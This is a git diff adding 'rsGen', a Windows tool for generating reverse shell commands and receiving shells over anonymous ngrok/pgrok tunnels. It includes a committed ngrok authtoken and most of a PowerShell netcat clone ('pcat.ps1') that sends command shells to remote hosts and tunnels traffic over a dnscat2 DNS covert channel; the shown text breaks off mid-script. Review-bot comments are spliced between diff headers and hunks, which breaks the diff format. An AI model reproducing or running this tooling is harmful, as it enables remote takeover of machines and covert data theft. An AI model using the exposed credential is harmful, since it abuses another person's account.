diff --git a/.gitattributes b/.gitattributes
new file mode 100644
index 0000000..8ad8b13
--- /dev/null
+++ b/.gitattributes
@@ -0,0 +1,29 @@
+* linguist-vendored
+*.bat linguist-language=Flyfish
+# In general, use LF for text
+* text eol=crlf
+
+# Windows CMD does not like LF in batch files
+*.bat text eol=crlf
+*.cmd text eol=crlf
+
+# Visual Studio solutions like to switch to CRLF at times
+*.sln text eol=crlf
+
+*.ai binary
+*.aiff binary
+*.dll binary
+*.eot binary
+*.exe binary
+*.jar binary
+*.jpg binary
+*.gif binary
+*.mp3 binary
+*.o binary
+*.pdf binary
+*.png binary
+*.psd binary
+*.so binary
+*.ttf binary
+*.winmd binary
+*.zip binary
\ No newline at end of file
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..7f224c4
--- /dev/null
+++ b/README.md
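Review bot: The comment `# In general, use LF for text` directly contradicts the rule under it, `* text eol=crlf`, which forces CRLF on every text file; the later `*.bat`, `*.cmd` and `*.sln` CRLF overrides only make sense if the default is LF, so either change the default to `* text eol=lf` or rewrite the comment to say CRLF is the default. The `*.bat linguist-language=Flyfish` line names a language Linguist does not appear to know (it looks like the author's handle), so it will likely be ignored; `linguist-language=Batchfile` is presumably what was meant. Marking everything with `* linguist-vendored` also hides the whole repository from language statistics, which may or may not be intended.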
@@ -0,0 +1,41 @@ + + rsGen v2.0 - Reverse Shell Command Genrator. + = + + rsGen is an automated reverse shell command genrator, built by Windows Batch and Jscript. The main functions include native command generation and variant command generation. In version 2.0, I added an anonymous reverse shell receiving function "-ngrok" and "-pgrok". + +![rsGen](https://raw.githubusercontent.com/FlyfishSec/rsGen/master/doc/rsgen.png "rsGen") + +## Usage + + +``` + +-pub Generate a "variant command".Use this parameter,the Command will be encoded upload to the + public pastebin website. + +-lan In some cases, the target machine cannot request an external network.This parameter will call + mongoose.exe in the command directory(a mini web server, only 144kb, see the website: + https://cesanta.com/), enable a web service on the local port 80 for command request execution. + After the end, you need to manually exit it. + +-listen Start port listening locally to receive shell that bounce back.Start port listening locally + to receive a shell that bounces back, Function equivalent to the netcat (call powercat.ps1). + +-ngrok Start ngrok TCP Tunnel(Contains -pub, -listen options).Notice:I added a ngrok authtoken. Since + it is a free plan, it may not be available to multiple people. You can go to ngrok.com to apply + for your own authtoken, and then modify your authtoken in the include/config.yaml file + +-pgrok Start pgrok TCP Tunnel(Contains -pub, -listen options).like ngrok but free and unlimited. + +``` +![rsGen](https://raw.githubusercontent.com/FlyfishSec/rsGen/master/doc/rsgen-pgrok.png "rsGen-pgrok") + + +## Operating system + + A Windows 7 or higher Windows operating system. + + + + diff --git a/doc/rsgen-pgrok.png b/doc/rsgen-pgrok.png new file mode 100644 index 0000000..cb2eb9f Binary files /dev/null and b/doc/rsgen-pgrok.png differ diff --git a/doc/rsgen.png b/doc/rsgen.png new file mode 100644 index 0000000..0851111 Binary files /dev/null and b/doc/rsgen.png differ 
diff --git a/include/curl.exe b/include/curl.exe
new file mode 100644
index 0000000..64ac0b2
Binary files /dev/null and b/include/curl.exe differ
diff --git a/include/mongoose.exe b/include/mongoose.exe
new file mode 100644
index 0000000..dbda1a3
Binary files /dev/null and b/include/mongoose.exe differ
diff --git a/include/ngrok.exe b/include/ngrok.exe
new file mode 100644
index 0000000..3c9e9e6
Binary files /dev/null and b/include/ngrok.exe differ
diff --git a/include/ngrok.yml b/include/ngrok.yml
new file mode 100644
index 0000000..d849fa4
--- /dev/null
+++ b/include/ngrok.yml
@@ -0,0 +1 @@
+authtoken: 1pqNPomgd8IS4MEVD5ixWqbynci_7qPUV8PQ9bZhDhR23gvBq
diff --git a/include/pcat.ps1 b/include/pcat.ps1
new file mode 100644
index 0000000..2693996
--- /dev/null
+++ b/include/pcat.ps1
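Review bot: The `authtoken:` value added in include/ngrok.yml is a live ngrok account credential committed in plaintext, and the README in this same commit advertises that it is shared; anyone who clones the repository can open tunnels under that account, exhaust its free-plan limits, or get it banned, and the tunnels it creates are attributed to the author. Treat the token as compromised and revoke/rotate it at ngrok.com now — deleting the line in a later commit does not remove it from history, so the history would also need rewriting. Ship a placeholder instead, e.g. an `include/ngrok.yml.example` containing `authtoken: <your-ngrok-authtoken>`, add `include/ngrok.yml` to .gitignore, and have the batch/JScript wrapper read the real token from that untracked file or from an environment variable. The README text mentioning `include/config.yaml` also appears to disagree with the actual path `include/ngrok.yml`, so the docs should point at whichever file the loader really reads. Separately, curl.exe, mongoose.exe and ngrok.exe are checked in as unversioned binaries with no recorded source URL or checksum; noting the upstream version and a SHA-256 for each in the README would let users verify them.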
@@ -0,0 +1,948 @@ +function pcat +{ + param( + [alias("Client")][string]$c="", + [alias("Listen")][switch]$l=$False, + [alias("Port")][Parameter(Position=-1)][string]$p="", + [alias("Execute")][string]$e="", + [alias("ExecutePowershell")][switch]$ep=$False, + [alias("Relay")][string]$r="", + [alias("UDP")][switch]$u=$False, + [alias("dnscat2")][string]$dns="", + [alias("DNSFailureThreshold")][int32]$dnsft=10, + [alias("Timeout")][int32]$t=60, + [Parameter(ValueFromPipeline=$True)][alias("Input")]$i=$null, + [ValidateSet('Host', 'Bytes', 'String')][alias("OutputType")][string]$o="Host", + [alias("OutputFile")][string]$of="", + [alias("Disconnect")][switch]$d=$False, + [alias("Repeater")][switch]$rep=$False, + [alias("GeneratePayload")][switch]$g=$False, + [alias("GenerateEncoded")][switch]$ge=$False, + [alias("Help")][switch]$h=$False + ) + + ############### HELP ############### + $Help = " +pcat - Netcat, The Powershell Version +Github Repository: https://github.com/besimorhino/pcat + +This script attempts to implement the features of netcat in a powershell +script. It also contains extra features such as built-in relays, execute +powershell, and a dnscat2 client. + +Usage: pcat [-c or -l] [-p port] [options] + + -c Client Mode. Provide the IP of the system you wish to connect to. + If you are using -dns, specify the DNS Server to send queries to. + + -l Listen Mode. Start a listener on the port specified by -p. + + -p Port. The port to connect to, or the port to listen on. + + -e Execute. Specify the name of the process to start. + + -ep Execute Powershell. Start a pseudo powershell session. You can + declare variables and execute commands, but if you try to enter + another shell (nslookup, netsh, cmd, etc.) the shell will hang. + + -r Relay. Used for relaying network traffic between two nodes. + Client Relay Format: -r :: + Listener Relay Format: -r : + DNSCat2 Relay Format: -r dns::: + + -u UDP Mode. Send traffic over UDP. 
Because it's UDP, the client + must send data before the server can respond. + + -dns DNS Mode. Send traffic over the dnscat2 dns covert channel. + Specify the dns server to -c, the dns port to -p, and specify the + domain to this option, -dns. This is only a client. + Get the server here: https://github.com/iagox86/dnscat2 + + -dnsft DNS Failure Threshold. This is how many bad packets the client can + recieve before exiting. Set to zero when receiving files, and set high + for more stability over the internet. + + -t Timeout. The number of seconds to wait before giving up on listening or + connecting. Default: 60 + + -i Input. Provide data to be sent down the pipe as soon as a connection is + established. Used for moving files. You can provide the path to a file, + a byte array object, or a string. You can also pipe any of those into + pcat, like 'aaaaaa' | pcat -c 10.1.1.1 -p 80 + + -o Output. Specify how pcat should return information to the console. + Valid options are 'Bytes', 'String', or 'Host'. Default is 'Host'. + + -of Output File. Specify the path to a file to write output to. + + -d Disconnect. pcat will disconnect after the connection is established + and the input from -i is sent. Used for scanning. + + -rep Repeater. pcat will continually restart after it is disconnected. + Used for setting up a persistent server. + + -g Generate Payload. Returns a script as a string which will execute the + pcat with the options you have specified. -i, -d, and -rep will not + be incorporated. + + -ge Generate Encoded Payload. Does the same as -g, but returns a string which + can be executed in this way: powershell -E + + -h Print this help message. + +Examples: + + Listen on port 8000 and print the output to the console. + pcat -l -p 8000 + + Connect to 10.1.1.1 port 443, send a shell, and enable verbosity. + pcat -c 10.1.1.1 -p 443 -e cmd -v + + Connect to the dnscat2 server on c2.example.com, and send dns queries + to the dns server on 10.1.1.1 port 53. 
+ pcat -c 10.1.1.1 -p 53 -dns c2.example.com + + Send a file to 10.1.1.15 port 8000. + pcat -c 10.1.1.15 -p 8000 -i C:\inputfile + + Write the data sent to the local listener on port 4444 to C:\outfile + pcat -l -p 4444 -of C:\outfile + + Listen on port 8000 and repeatedly server a powershell shell. + pcat -l -p 8000 -ep -rep + + Relay traffic coming in on port 8000 over tcp to port 9000 on 10.1.1.1 over tcp. + pcat -l -p 8000 -r tcp:10.1.1.1:9000 + + Relay traffic coming in on port 8000 over tcp to the dnscat2 server on c2.example.com, + sending queries to 10.1.1.1 port 53. + pcat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com +" + if($h){return $Help} + ############### HELP ############### + + ############### VALIDATE ARGS ############### + $global:Verbose = $Verbose + if($of -ne ''){$o = 'Bytes'} + if($dns -eq "") + { + if((($c -eq "") -and (!$l)) -or (($c -ne "") -and $l)){return "You must select either client mode (-c) or listen mode (-l)."} + if($p -eq ""){return "Please provide a port number to -p."} + } + if(((($r -ne "") -and ($e -ne "")) -or (($e -ne "") -and ($ep))) -or (($r -ne "") -and ($ep))){return "You can only pick one of these: -e, -ep, -r"} + if(($i -ne $null) -and (($r -ne "") -or ($e -ne ""))){return "-i is not applicable here."} + if($l) + { + $Failure = $False + netstat -na | Select-String LISTENING | % {if(($_.ToString().split(":")[1].split(" ")[0]) -eq $p){Write-Output ("The selected port " + $p + " is already in use.") ; $Failure=$True}} + if($Failure){break} + } + if($r -ne "") + { + if($r.split(":").Count -eq 2) + { + $Failure = $False + netstat -na | Select-String LISTENING | % {if(($_.ToString().split(":")[1].split(" ")[0]) -eq $r.split(":")[1]){Write-Output ("The selected port " + $r.split(":")[1] + " is already in use.") ; $Failure=$True}} + if($Failure){break} + } + } + ############### VALIDATE ARGS ############### + + ############### UDP FUNCTIONS ############### + function Setup_UDP + { + param($FuncSetupVars) + 
if($global:Verbose){$Verbose = $True} + $c,$l,$p,$t = $FuncSetupVars + $FuncVars = @{} + $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding + if($l) + { + $SocketDestinationBuffer = New-Object System.Byte[] 65536 + $EndPoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Any), $p + $FuncVars["Socket"] = New-Object System.Net.Sockets.UDPClient $p + $PacketInfo = New-Object System.Net.Sockets.IPPacketInformation + Write-Verbose ("Listening on [0.0.0.0] port " + $p + " [udp]") + $ConnectHandle = $FuncVars["Socket"].Client.BeginReceiveMessageFrom($SocketDestinationBuffer,0,65536,[System.Net.Sockets.SocketFlags]::None,[ref]$EndPoint,$null,$null) + $Stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + while($True) + { + if($Host.UI.RawUI.KeyAvailable) + { + if(@(17,27) -contains ($Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown,IncludeKeyUp").VirtualKeyCode)) + { + Write-Verbose "CTRL or ESC caught. Stopping UDP Setup..." + $FuncVars["Socket"].Close() + $Stopwatch.Stop() + break + } + } + if($Stopwatch.Elapsed.TotalSeconds -gt $t) + { + $FuncVars["Socket"].Close() + $Stopwatch.Stop() + Write-Verbose "Timeout!" 
; break + } + if($ConnectHandle.IsCompleted) + { + $SocketBytesRead = $FuncVars["Socket"].Client.EndReceiveMessageFrom($ConnectHandle,[ref]([System.Net.Sockets.SocketFlags]::None),[ref]$EndPoint,[ref]$PacketInfo) + Write-Verbose ("Connection from [" + $EndPoint.Address.IPAddressToString + "] port " + $p + " [udp] accepted (source port " + $EndPoint.Port + ")") + if($SocketBytesRead -gt 0){break} + else{break} + } + } + $Stopwatch.Stop() + $FuncVars["InitialConnectionBytes"] = $SocketDestinationBuffer[0..([int]$SocketBytesRead-1)] + } + else + { + if(!$c.Contains(".")) + { + $IPList = @() + [System.Net.Dns]::GetHostAddresses($c) | Where-Object {$_.AddressFamily -eq "InterNetwork"} | %{$IPList += $_.IPAddressToString} + Write-Verbose ("Name " + $c + " resolved to address " + $IPList[0]) + $EndPoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse($IPList[0])), $p + } + else + { + $EndPoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse($c)), $p + } + $FuncVars["Socket"] = New-Object System.Net.Sockets.UDPClient + $FuncVars["Socket"].Connect($c,$p) + Write-Verbose ("Sending UDP traffic to " + $c + " port " + $p + "...") + Write-Verbose ("UDP: Make sure to send some data so the server can notice you!") + } + $FuncVars["BufferSize"] = 65536 + $FuncVars["EndPoint"] = $EndPoint + $FuncVars["StreamDestinationBuffer"] = New-Object System.Byte[] $FuncVars["BufferSize"] + $FuncVars["StreamReadOperation"] = $FuncVars["Socket"].Client.BeginReceiveFrom($FuncVars["StreamDestinationBuffer"],0,$FuncVars["BufferSize"],([System.Net.Sockets.SocketFlags]::None),[ref]$FuncVars["EndPoint"],$null,$null) + return $FuncVars + } + function ReadData_UDP + { + param($FuncVars) + $Data = $null + if($FuncVars["StreamReadOperation"].IsCompleted) + { + $StreamBytesRead = $FuncVars["Socket"].Client.EndReceiveFrom($FuncVars["StreamReadOperation"],[ref]$FuncVars["EndPoint"]) + if($StreamBytesRead -eq 0){break} + $Data = 
$FuncVars["StreamDestinationBuffer"][0..([int]$StreamBytesRead-1)] + $FuncVars["StreamReadOperation"] = $FuncVars["Socket"].Client.BeginReceiveFrom($FuncVars["StreamDestinationBuffer"],0,$FuncVars["BufferSize"],([System.Net.Sockets.SocketFlags]::None),[ref]$FuncVars["EndPoint"],$null,$null) + } + return $Data,$FuncVars + } + function WriteData_UDP + { + param($Data,$FuncVars) + $FuncVars["Socket"].Client.SendTo($Data,$FuncVars["EndPoint"]) | Out-Null + return $FuncVars + } + function Close_UDP + { + param($FuncVars) + $FuncVars["Socket"].Close() + } + ############### UDP FUNCTIONS ############### + + ############### DNS FUNCTIONS ############### + function Setup_DNS + { + param($FuncSetupVars) + if($global:Verbose){$Verbose = $True} + function ConvertTo-HexArray + { + param($String) + $Hex = @() + $String.ToCharArray() | % {"{0:x}" -f [byte]$_} | % {if($_.Length -eq 1){"0" + [string]$_} else{[string]$_}} | % {$Hex += $_} + return $Hex + } + + function SendPacket + { + param($Packet,$DNSServer,$DNSPort) + $Command = ("set type=TXT`nserver $DNSServer`nset port=$DNSPort`nset domain=.com`nset retry=1`n" + $Packet + "`nexit") + $result = ($Command | nslookup 2>&1 | Out-String) + if($result.Contains('"')){return ([regex]::Match($result.replace("bio=",""),'(?<=")[^"]*(?=")').Value)} + else{return 1} + } + + function Create_SYN + { + param($SessionId,$SeqNum,$Tag,$Domain) + return ($Tag + ([string](Get-Random -Maximum 9999 -Minimum 1000)) + "00" + $SessionId + $SeqNum + "0000" + $Domain) + } + + function Create_FIN + { + param($SessionId,$Tag,$Domain) + return ($Tag + ([string](Get-Random -Maximum 9999 -Minimum 1000)) + "02" + $SessionId + "00" + $Domain) + } + + function Create_MSG + { + param($SessionId,$SeqNum,$AcknowledgementNumber,$Data,$Tag,$Domain) + return ($Tag + ([string](Get-Random -Maximum 9999 -Minimum 1000)) + "01" + $SessionId + $SeqNum + $AcknowledgementNumber + $Data + $Domain) + } + + function DecodePacket + { + param($Packet) + + if((($Packet.Length)%2 
-eq 1) -or ($Packet.Length -eq 0)){return 1} + $AcknowledgementNumber = ($Packet[10..13] -join "") + $SeqNum = ($Packet[14..17] -join "") + [byte[]]$ReturningData = @() + + if($Packet.Length -gt 18) + { + $PacketElim = $Packet.Substring(18) + while($PacketElim.Length -gt 0) + { + $ReturningData += [byte[]][Convert]::ToInt16(($PacketElim[0..1] -join ""),16) + $PacketElim = $PacketElim.Substring(2) + } + } + + return $Packet,$ReturningData,$AcknowledgementNumber,$SeqNum + } + + function AcknowledgeData + { + param($ReturningData,$AcknowledgementNumber) + $Hex = [string]("{0:x}" -f (([uint16]("0x" + $AcknowledgementNumber) + $ReturningData.Length) % 65535)) + if($Hex.Length -ne 4){$Hex = (("0"*(4-$Hex.Length)) + $Hex)} + return $Hex + } + $FuncVars = @{} + $FuncVars["DNSServer"],$FuncVars["DNSPort"],$FuncVars["Domain"],$FuncVars["FailureThreshold"] = $FuncSetupVars + if($FuncVars["DNSPort"] -eq ''){$FuncVars["DNSPort"] = "53"} + $FuncVars["Tag"] = "" + $FuncVars["Domain"] = ("." + $FuncVars["Domain"]) + + $FuncVars["Create_SYN"] = ${function:Create_SYN} + $FuncVars["Create_MSG"] = ${function:Create_MSG} + $FuncVars["Create_FIN"] = ${function:Create_FIN} + $FuncVars["DecodePacket"] = ${function:DecodePacket} + $FuncVars["ConvertTo-HexArray"] = ${function:ConvertTo-HexArray} + $FuncVars["AckData"] = ${function:AcknowledgeData} + $FuncVars["SendPacket"] = ${function:SendPacket} + $FuncVars["SessionId"] = ([string](Get-Random -Maximum 9999 -Minimum 1000)) + $FuncVars["SeqNum"] = ([string](Get-Random -Maximum 9999 -Minimum 1000)) + $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding + $FuncVars["Failures"] = 0 + + $SYNPacket = (Invoke-Command $FuncVars["Create_SYN"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["SeqNum"],$FuncVars["Tag"],$FuncVars["Domain"])) + $ResponsePacket = (Invoke-Command $FuncVars["SendPacket"] -ArgumentList @($SYNPacket,$FuncVars["DNSServer"],$FuncVars["DNSPort"])) + $DecodedPacket = (Invoke-Command $FuncVars["DecodePacket"] 
-ArgumentList @($ResponsePacket)) + if($DecodedPacket -eq 1){return "Bad SYN response. Ensure your server is set up correctly."} + $ReturningData = $DecodedPacket[1] + if($ReturningData -ne ""){$FuncVars["InputData"] = ""} + $FuncVars["AckNum"] = $DecodedPacket[2] + $FuncVars["MaxMSGDataSize"] = (244 - (Invoke-Command $FuncVars["Create_MSG"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["SeqNum"],$FuncVars["AckNum"],"",$FuncVars["Tag"],$FuncVars["Domain"])).Length) + if($FuncVars["MaxMSGDataSize"] -le 0){return "Domain name is too long."} + return $FuncVars + } + function ReadData_DNS + { + param($FuncVars) + if($global:Verbose){$Verbose = $True} + + $PacketsData = @() + $PacketData = "" + + if($FuncVars["InputData"] -ne $null) + { + $Hex = (Invoke-Command $FuncVars["ConvertTo-HexArray"] -ArgumentList @($FuncVars["InputData"])) + $SectionCount = 0 + $PacketCount = 0 + foreach($Char in $Hex) + { + if($SectionCount -ge 30) + { + $SectionCount = 0 + $PacketData += "." + } + if($PacketCount -ge ($FuncVars["MaxMSGDataSize"])) + { + $PacketsData += $PacketData.TrimEnd(".") + $PacketCount = 0 + $SectionCount = 0 + $PacketData = "" + } + $PacketData += $Char + $SectionCount += 2 + $PacketCount += 2 + } + $PacketData = $PacketData.TrimEnd(".") + $PacketsData += $PacketData + $FuncVars["InputData"] = "" + } + else + { + $PacketsData = @("") + } + + [byte[]]$ReturningData = @() + foreach($PacketData in $PacketsData) + { + try{$MSGPacket = Invoke-Command $FuncVars["Create_MSG"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["SeqNum"],$FuncVars["AckNum"],$PacketData,$FuncVars["Tag"],$FuncVars["Domain"])} + catch{ Write-Verbose "DNSCAT2: Failed to create packet." ; $FuncVars["Failures"] += 1 ; continue } + try{$Packet = (Invoke-Command $FuncVars["SendPacket"] -ArgumentList @($MSGPacket,$FuncVars["DNSServer"],$FuncVars["DNSPort"]))} + catch{ Write-Verbose "DNSCAT2: Failed to send packet." 
; $FuncVars["Failures"] += 1 ; continue } + try + { + $DecodedPacket = (Invoke-Command $FuncVars["DecodePacket"] -ArgumentList @($Packet)) + if($DecodedPacket.Length -ne 4){ Write-Verbose "DNSCAT2: Failure to decode packet, dropping..."; $FuncVars["Failures"] += 1 ; continue } + $FuncVars["AckNum"] = $DecodedPacket[2] + $FuncVars["SeqNum"] = $DecodedPacket[3] + $ReturningData += $DecodedPacket[1] + } + catch{ Write-Verbose "DNSCAT2: Failure to decode packet, dropping..." ; $FuncVars["Failures"] += 1 ; continue } + if($DecodedPacket -eq 1){ Write-Verbose "DNSCAT2: Failure to decode packet, dropping..." ; $FuncVars["Failures"] += 1 ; continue } + } + + if($FuncVars["Failures"] -ge $FuncVars["FailureThreshold"]){break} + + if($ReturningData -ne @()) + { + $FuncVars["AckNum"] = (Invoke-Command $FuncVars["AckData"] -ArgumentList @($ReturningData,$FuncVars["AckNum"])) + } + return $ReturningData,$FuncVars + } + function WriteData_DNS + { + param($Data,$FuncVars) + $FuncVars["InputData"] = $FuncVars["Encoding"].GetString($Data) + return $FuncVars + } + function Close_DNS + { + param($FuncVars) + $FINPacket = Invoke-Command $FuncVars["Create_FIN"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["Tag"],$FuncVars["Domain"]) + Invoke-Command $FuncVars["SendPacket"] -ArgumentList @($FINPacket,$FuncVars["DNSServer"],$FuncVars["DNSPort"]) | Out-Null + } + ############### DNS FUNCTIONS ############### + + ########## TCP FUNCTIONS ########## + function Setup_TCP + { + param($FuncSetupVars) + $c,$l,$p,$t = $FuncSetupVars + if($global:Verbose){$Verbose = $True} + $FuncVars = @{} + if(!$l) + { + $FuncVars["l"] = $False + $Socket = New-Object System.Net.Sockets.TcpClient + Write-Verbose "Connecting..." 
+ $Handle = $Socket.BeginConnect($c,$p,$null,$null) + } + else + { + $FuncVars["l"] = $True + Write-Verbose ("Listening on [0.0.0.0] (port " + $p + ")") + $Socket = New-Object System.Net.Sockets.TcpListener $p + $Socket.Start() + $Handle = $Socket.BeginAcceptTcpClient($null, $null) + } + + $Stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + while($True) + { + if($Host.UI.RawUI.KeyAvailable) + { + if(@(17,27) -contains ($Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown,IncludeKeyUp").VirtualKeyCode)) + { + Write-Verbose "CTRL or ESC caught. Stopping TCP Setup..." + if($FuncVars["l"]){$Socket.Stop()} + else{$Socket.Close()} + $Stopwatch.Stop() + break + } + } + if($Stopwatch.Elapsed.TotalSeconds -gt $t) + { + if(!$l){$Socket.Close()} + else{$Socket.Stop()} + $Stopwatch.Stop() + Write-Verbose "Timeout!" ; break + break + } + if($Handle.IsCompleted) + { + if(!$l) + { + try + { + $Socket.EndConnect($Handle) + $Stream = $Socket.GetStream() + $BufferSize = $Socket.ReceiveBufferSize + Write-Verbose ("Connection to " + $c + ":" + $p + " [tcp] succeeded!") + } + catch{$Socket.Close(); $Stopwatch.Stop(); break} + } + else + { + $Client = $Socket.EndAcceptTcpClient($Handle) + $Stream = $Client.GetStream() + $BufferSize = $Client.ReceiveBufferSize + Write-Verbose ("Connection from [" + $Client.Client.RemoteEndPoint.Address.IPAddressToString + "] port " + $port + " [tcp] accepted (source port " + $Client.Client.RemoteEndPoint.Port + ")") + } + break + } + } + $Stopwatch.Stop() + if($Socket -eq $null){break} + $FuncVars["Stream"] = $Stream + $FuncVars["Socket"] = $Socket + $FuncVars["BufferSize"] = $BufferSize + $FuncVars["StreamDestinationBuffer"] = (New-Object System.Byte[] $FuncVars["BufferSize"]) + $FuncVars["StreamReadOperation"] = $FuncVars["Stream"].BeginRead($FuncVars["StreamDestinationBuffer"], 0, $FuncVars["BufferSize"], $null, $null) + $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding + $FuncVars["StreamBytesRead"] = 1 + return $FuncVars + } + function 
ReadData_TCP + { + param($FuncVars) + $Data = $null + if($FuncVars["StreamBytesRead"] -eq 0){break} + if($FuncVars["StreamReadOperation"].IsCompleted) + { + $StreamBytesRead = $FuncVars["Stream"].EndRead($FuncVars["StreamReadOperation"]) + if($StreamBytesRead -eq 0){break} + $Data = $FuncVars["StreamDestinationBuffer"][0..([int]$StreamBytesRead-1)] + $FuncVars["StreamReadOperation"] = $FuncVars["Stream"].BeginRead($FuncVars["StreamDestinationBuffer"], 0, $FuncVars["BufferSize"], $null, $null) + } + return $Data,$FuncVars + } + function WriteData_TCP + { + param($Data,$FuncVars) + $FuncVars["Stream"].Write($Data, 0, $Data.Length) + return $FuncVars + } + function Close_TCP + { + param($FuncVars) + try{$FuncVars["Stream"].Close()} + catch{} + if($FuncVars["l"]){$FuncVars["Socket"].Stop()} + else{$FuncVars["Socket"].Close()} + } + ########## TCP FUNCTIONS ########## + + ########## CMD FUNCTIONS ########## + function Setup_CMD + { + param($FuncSetupVars) + if($global:Verbose){$Verbose = $True} + $FuncVars = @{} + $ProcessStartInfo = New-Object System.Diagnostics.ProcessStartInfo + $ProcessStartInfo.FileName = $FuncSetupVars[0] + $ProcessStartInfo.UseShellExecute = $False + $ProcessStartInfo.RedirectStandardInput = $True + $ProcessStartInfo.RedirectStandardOutput = $True + $ProcessStartInfo.RedirectStandardError = $True + $FuncVars["Process"] = [System.Diagnostics.Process]::Start($ProcessStartInfo) + Write-Verbose ("Starting Process " + $FuncSetupVars[0] + "...") + $FuncVars["Process"].Start() | Out-Null + $FuncVars["StdOutDestinationBuffer"] = New-Object System.Byte[] 65536 + $FuncVars["StdOutReadOperation"] = $FuncVars["Process"].StandardOutput.BaseStream.BeginRead($FuncVars["StdOutDestinationBuffer"], 0, 65536, $null, $null) + $FuncVars["StdErrDestinationBuffer"] = New-Object System.Byte[] 65536 + $FuncVars["StdErrReadOperation"] = $FuncVars["Process"].StandardError.BaseStream.BeginRead($FuncVars["StdErrDestinationBuffer"], 0, 65536, $null, $null) + 
$FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding + return $FuncVars + } + function ReadData_CMD + { + param($FuncVars) + [byte[]]$Data = @() + if($FuncVars["StdOutReadOperation"].IsCompleted) + { + $StdOutBytesRead = $FuncVars["Process"].StandardOutput.BaseStream.EndRead($FuncVars["StdOutReadOperation"]) + if($StdOutBytesRead -eq 0){break} + $Data += $FuncVars["StdOutDestinationBuffer"][0..([int]$StdOutBytesRead-1)] + $FuncVars["StdOutReadOperation"] = $FuncVars["Process"].StandardOutput.BaseStream.BeginRead($FuncVars["StdOutDestinationBuffer"], 0, 65536, $null, $null) + } + if($FuncVars["StdErrReadOperation"].IsCompleted) + { + $StdErrBytesRead = $FuncVars["Process"].StandardError.BaseStream.EndRead($FuncVars["StdErrReadOperation"]) + if($StdErrBytesRead -eq 0){break} + $Data += $FuncVars["StdErrDestinationBuffer"][0..([int]$StdErrBytesRead-1)] + $FuncVars["StdErrReadOperation"] = $FuncVars["Process"].StandardError.BaseStream.BeginRead($FuncVars["StdErrDestinationBuffer"], 0, 65536, $null, $null) + } + return $Data,$FuncVars + } + function WriteData_CMD + { + param($Data,$FuncVars) + $FuncVars["Process"].StandardInput.WriteLine($FuncVars["Encoding"].GetString($Data).TrimEnd("`r").TrimEnd("`n")) + return $FuncVars + } + function Close_CMD + { + param($FuncVars) + $FuncVars["Process"] | Stop-Process + } + ########## CMD FUNCTIONS ########## + + ########## POWERSHELL FUNCTIONS ########## + function Main_Powershell + { + param($Stream1SetupVars) + try + { + $encoding = New-Object System.Text.AsciiEncoding + [byte[]]$InputToWrite = @() + if($i -ne $null) + { + Write-Verbose "Input from -i detected..." + if(Test-Path $i){ [byte[]]$InputToWrite = ([io.file]::ReadAllBytes($i)) } + elseif($i.GetType().Name -eq "Byte[]"){ [byte[]]$InputToWrite = $i } + elseif($i.GetType().Name -eq "String"){ [byte[]]$InputToWrite = $Encoding.GetBytes($i) } + else{Write-Host "Unrecognised input type." ; return} + } + + Write-Verbose "Setting up Stream 1... 
(ESC/CTRL to exit)" + try{$Stream1Vars = Stream1_Setup $Stream1SetupVars} + catch{Write-Verbose "Stream 1 Setup Failure" ; return} + + Write-Verbose "Setting up Stream 2... (ESC/CTRL to exit)" + try + { + $IntroPrompt = $Encoding.GetBytes("Windows PowerShell`nCopyright (C) 2013 Microsoft Corporation. All rights reserved.`n`n" + ("PS " + (pwd).Path + "> ")) + $Prompt = ("PS " + (pwd).Path + "> ") + $CommandToExecute = "" + $Data = $null + } + catch + { + Write-Verbose "Stream 2 Setup Failure" ; return + } + + if($InputToWrite -ne @()) + { + Write-Verbose "Writing input to Stream 1..." + try{$Stream1Vars = Stream1_WriteData $InputToWrite $Stream1Vars} + catch{Write-Host "Failed to write input to Stream 1" ; return} + } + + if($d){Write-Verbose "-d (disconnect) Activated. Disconnecting..." ; return} + + Write-Verbose "Both Communication Streams Established. Redirecting Data Between Streams..." + while($True) + { + try + { + ##### Stream2 Read ##### + $Prompt = $null + $ReturnedData = $null + if($CommandToExecute -ne "") + { + try{[byte[]]$ReturnedData = $Encoding.GetBytes((IEX $CommandToExecute 2>&1 | Out-String))} + catch{[byte[]]$ReturnedData = $Encoding.GetBytes(($_ | Out-String))} + $Prompt = $Encoding.GetBytes(("PS " + (pwd).Path + "> ")) + } + $Data += $IntroPrompt + $IntroPrompt = $null + $Data += $ReturnedData + $Data += $Prompt + $CommandToExecute = "" + ##### Stream2 Read ##### + + if($Data -ne $null){$Stream1Vars = Stream1_WriteData $Data $Stream1Vars} + $Data = $null + } + catch + { + Write-Verbose "Failed to redirect data from Stream 2 to Stream 1" ; return + } + + try + { + $Data,$Stream1Vars = Stream1_ReadData $Stream1Vars + if($Data.Length -eq 0){Start-Sleep -Milliseconds 100} + if($Data -ne $null){$CommandToExecute = $Encoding.GetString($Data)} + $Data = $null + } + catch + { + Write-Verbose "Failed to redirect data from Stream 1 to Stream 2" ; return + } + } + } + finally + { + try + { + Write-Verbose "Closing Stream 1..." 
